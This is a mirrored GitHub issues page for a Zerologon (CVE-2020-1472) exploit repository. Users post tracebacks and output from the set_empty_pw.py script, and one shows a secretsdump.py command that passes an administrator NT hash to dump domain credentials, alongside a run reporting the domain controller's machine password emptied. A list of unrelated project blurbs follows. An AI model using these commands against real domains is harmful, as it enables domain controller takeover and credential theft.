risksense / zerologon Goto Github PK
View Code? Open in Web Editor NEWExploit for zerologon cve-2020-1472
License: MIT License
Exploit for zerologon cve-2020-1472
License: MIT License
Traceback (most recent call last):
File "/root/zerologon/set_empty_pw.py", line 147, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "/root/zerologon/set_empty_pw.py", line 123, in perform_attack
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/zerologon/set_empty_pw.py", line 28, in try_zero_authenticate
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/epm.py", line 1328, in hept_map
resp = dce.request(request)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x16c9a0d6 - ept_s_not_registered
Anyone has any idea how to fix this issue?
sudo secretsdump.py -hashes :a656220101bf64f4768fecce5a4eb5fb 'REPUBLIC/[email protected]'
Impacket v0.9.23.dev1+20210518.120245.2e3cd7cd - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
I'm testing on a client, but the server is with ipv6, and the script is not working. Would there be another way to use this exploit?
Solved
what is the ORIG_NT_HASH,administrator NM hash,or $MACHINE.ACC:plain_password_hex?
Why does reintsall_original_pw use the same attack to logon? At this point the target's account password should be empty, can't we use the hash of an empty password to authenticate?
hi
when i used python`s script received this error:
Performing authentication attempts...
Unexpected error: [Errno 104] Connection reset by peer.
This might have been caused by invalid arguments or network issues.
please help me
set_empty_pw hits an error and is not successful see error below.
Other POCs worked OK
root@kali:~/Desktop/zerologon-master# python3 set_empty_pw.py DCNAME 10.102.9.46
Performing authentication attempts...
==============================================================================================================================================
NetrServerAuthenticate3Response
ServerCredential:
Data: b'\x0c\x818\x9e\x86\xe34\xc7'
NegotiateFlags: 556793855
AccountRid: 1008
ErrorCode: 0
server challenge b'\x0c\x08\xa9\x05\xb8SD>'
'bytes' object does not support item assignment
Success! DC should now have the empty string as its machine password.
I'm testing on a client, but the server is with ipv6, and the script is not working. Would there be another way to use this exploit?
Performing authentication attempts...
Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 346, in connect
self.__socket.connect(sa)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "cve-2020-1472-exploit.py", line 126, in
main()
File "cve-2020-1472-exploit.py", line 123, in main
perform_attack('\\' + dc_name, dc_ip, victim)
File "cve-2020-1472-exploit.py", line 70, in perform_attack
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
dce.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 349, in connect
raise DCERPCException("Could not connect: %s" % msg)
impacket.dcerpc.v5.rpcrt.DCERPCException: Could not connect: timed out
Hi!
The title shows every time I run the "set_empty_pw.py" script, but right after the 'error' your script says: "success! dc should now have the empty string as its machine password". But btw, it doesn't!
I've reinstalled impacket, with
"pip3 install impacket"
downloaded the impacket repo from source
"python3.6 setup.py install"
"python3.6 setup.py build"
"sudo apt install python-impacket"
I've tried to change all the "#!/usr/bin/env " to "!/usr/bin/python3.6"
and the script keep complaining on that "has no attribute". I wrote a python3.6 script using NetrServerPasswordSet2 and then it doesn't get error.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.